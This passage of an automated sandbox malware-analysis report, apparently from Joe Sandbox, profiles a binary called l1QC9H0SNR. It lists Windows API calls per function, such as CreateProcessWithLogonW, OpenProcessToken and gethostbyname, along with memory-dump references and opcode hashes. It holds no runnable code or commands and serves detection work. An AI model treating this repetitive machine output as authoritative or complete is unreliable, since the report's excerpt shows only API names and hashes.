                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 73efa3f737f6e7ac4a0564615d638254f67314280d06ab595802819d8916cab1
                                              • Instruction ID: cad78512df26f50d9c17c8967276d05957e7182fc2c7d309c93c47644335fd87
                                              • Opcode Fuzzy Hash: 73efa3f737f6e7ac4a0564615d638254f67314280d06ab595802819d8916cab1
                                              • Instruction Fuzzy Hash: 9D11E372905A12AECB313F70EC4D76D37D8EB00361B1085AAF919AA260DF31C940D794
                                              Function 00B544A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B544CF
                                                • Part of subcall function 00B5407C: _memset.LIBCMT ref: 00B540FC
                                                • Part of subcall function 00B5407C: _wcscpy.LIBCMT ref: 00B54150
                                                • Part of subcall function 00B5407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00B54524
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B54533
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B8D4B9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                              • Instruction ID: 97f5a9dc25798cc3a40629b7449d7e4da601bf7907d6368109a1aea3dd41290a
                                              • Opcode Fuzzy Hash: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                              • Instruction Fuzzy Hash: 03210770908784AFE7329B249895BE6BBECEF11319F0800DEE69E57291D7746988CB41
                                              Function 00BA85B1 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BA85E2
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00BA85E9
                                              • CloseHandle.KERNEL32(00000004), ref: 00BA8603
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BA8632
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 2621361867-0
                                              • Opcode ID: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                              • Instruction ID: 1bfe341ee254715ef8de3e5abc73d6d5afe43301f8d3da12bd57127e74387e6e
                                              • Opcode Fuzzy Hash: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                              • Instruction Fuzzy Hash: 97115C7250520AABDF01CFA8DD49BEEBBE9EF09304F044065FE05A2160DB718D60DB60
                                              Function 00BC6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                              • gethostbyname.WS2_32(?), ref: 00BC6399
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC63A4
                                              • _memmove.LIBCMT ref: 00BC63D1
                                              • inet_ntoa.WS2_32(?), ref: 00BC63DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: 8de27c33b297f3e504bbf63a6f894cb87ecabdc1d4d2be1a665034a7800233b5
                                              • Instruction ID: 911e22a4bd592f9e4c35cff9dc8a0ef09b3264ec5c433e9906e25b92a9602068
                                              • Opcode Fuzzy Hash: 8de27c33b297f3e504bbf63a6f894cb87ecabdc1d4d2be1a665034a7800233b5
                                              • Instruction Fuzzy Hash: 7B112171904109EFCB04FBA4DD96EAEB7F8AF04311B1441E9F906A7261EF319E18DB61
                                              Function 00BA8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BA8B61
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B73
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B89
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8BA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: fea92ee234b7880881fa19a8d47ee16deb1074d1352682b6e03bef8d653fd212
                                              • Instruction ID: 8ca97d6eaef61a8f83bbf630862339404cb4a96d21e3f517b596e377c169aadd
                                              • Opcode Fuzzy Hash: fea92ee234b7880881fa19a8d47ee16deb1074d1352682b6e03bef8d653fd212
                                              • Instruction Fuzzy Hash: DB113A79901218BFDB10DB95C884EADBBB4EB48310F204095E900B7290DA716E10DBA4
                                              Function 00BB1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB115F
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB1184
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB118E
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB11C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: ec3477b2a2052f948105a7bc4b61a8e4ad4e081de9a20dc7a983ebe9b4210742
                                              • Instruction ID: 6fcc191a99c5175a8ad09bb1ac0bafa4106ef16b4cdf1efc6efa9d40c7e5b25d
                                              • Opcode Fuzzy Hash: ec3477b2a2052f948105a7bc4b61a8e4ad4e081de9a20dc7a983ebe9b4210742
                                              • Instruction Fuzzy Hash: 18115A31C0551DE7CF009FA9D898AFEBBB8FF09751F404496EA41B6240DBB09550CBA1
                                              Function 00BAD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BAD84D
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BAD864
                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BAD879
                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00BAD897
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: e446b4dca297c5f031df9475874f42152a5017f1e4695e3266937342e45c93f3
                                              • Instruction ID: 4cee9ab03568ad9095fab0dac93962cc471de50711340d5854a94266fa1be779
                                              • Opcode Fuzzy Hash: e446b4dca297c5f031df9475874f42152a5017f1e4695e3266937342e45c93f3
                                              • Instruction Fuzzy Hash: 16118E7160A305DBE7208F50EC48FA7BBFCEB01B00F1085AAA517D7990D7B8E5099FA1
                                              Function 00B86FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 3418e9e1c4ef3e24c7146e4c22f9312883afc4e8e79c0491643a41ce0d32e664
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: 2B014E7248814ABBCF176E84CC45CED3FA2FB18359B688495FA1858031DA36C9B1EB81
                                              Function 00BDB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BDB2E4
                                              • ScreenToClient.USER32(?,?), ref: 00BDB2FC
                                              • ScreenToClient.USER32(?,?), ref: 00BDB320
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDB33B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: 7e15b873f28402051adb76d81d99923945748c3659b729b4f7530323f749fb9b
                                              • Instruction ID: 1c6bd5756cc05913fd16eb27bab3170c3cc61474fdd64abfc55e9453be99b01f
                                              • Opcode Fuzzy Hash: 7e15b873f28402051adb76d81d99923945748c3659b729b4f7530323f749fb9b
                                              • Instruction Fuzzy Hash: CD112375D0420AEFDB41CF99C4449AEFBB5FB08310F108166E915A3620E735AA55DB50
                                              Function 00BDB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BDB644
                                              • _memset.LIBCMT ref: 00BDB653
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C16F20,00C16F64), ref: 00BDB682
                                              • CloseHandle.KERNEL32 ref: 00BDB694
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: e5739ddd76a4a19f6123e0db27a096e0ad7b31321068da5a53461731925c6b6b
                                              • Instruction ID: 5a626a0c0fee26fb10ac685b5bb05f1673e9f115696f014a545f4be66c1626df
                                              • Opcode Fuzzy Hash: e5739ddd76a4a19f6123e0db27a096e0ad7b31321068da5a53461731925c6b6b
                                              • Instruction Fuzzy Hash: D2F05EF2541300BEE61027A5BC06FFB7A9DEB0A395F008031BA09E6192E7718C02C7A8
                                              Function 00BB6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00BB6BE6
                                                • Part of subcall function 00BB76C4: _memset.LIBCMT ref: 00BB76F9
                                              • _memmove.LIBCMT ref: 00BB6C09
                                              • _memset.LIBCMT ref: 00BB6C16
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00BB6C26
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: 9b00dad0e93b82ade1ba19d23feb713cae30a8b1e173f03e691ff34a9d888619
                                              • Instruction ID: b5bd35111403df36aed76332fecf3f316cc8171415854bd8f878a314e6bc4e1d
                                              • Opcode Fuzzy Hash: 9b00dad0e93b82ade1ba19d23feb713cae30a8b1e173f03e691ff34a9d888619
                                              • Instruction Fuzzy Hash: BFF05E3A204100ABCF016F95DC85A9ABB69EF45320F04C0A1FE099F227DB71E911CBB4
                                              Function 00B52218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00B52231
                                              • SetTextColor.GDI32(?,000000FF), ref: 00B5223B
                                              • SetBkMode.GDI32(?,00000001), ref: 00B52250
                                              • GetStockObject.GDI32(00000005), ref: 00B52258
                                              • GetWindowDC.USER32(?,00000000), ref: 00B8BE83
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B8BE90
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00B8BEA9
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00B8BEC2
                                              • GetPixel.GDI32(00000000,?,?), ref: 00B8BEE2
                                              • ReleaseDC.USER32(?,00000000), ref: 00B8BEED
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                              • Instruction ID: 7da435155b0d254b053f0a4daccae55eb9145244d1f716a18ad64891270bd946
                                              • Opcode Fuzzy Hash: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                              • Instruction Fuzzy Hash: 0DE03932109245AADF215FA4FC0DBE87B50EB15336F0483A7FA6A580F19B728980DB12
                                              Function 00BA8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00BA871B
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8722
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BA82E6), ref: 00BA872F
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8736
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                              • Instruction ID: 3b6046166361b8c0491f4ee9ed911b1b930273916512fdb888be166b631da968
                                              • Opcode Fuzzy Hash: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                              • Instruction Fuzzy Hash: BAE0863661A2129BD7205FF05D0CB66BBECEF51791F158869B246CB040FE348841C750
                                              Function 00BAB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00BAB4BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
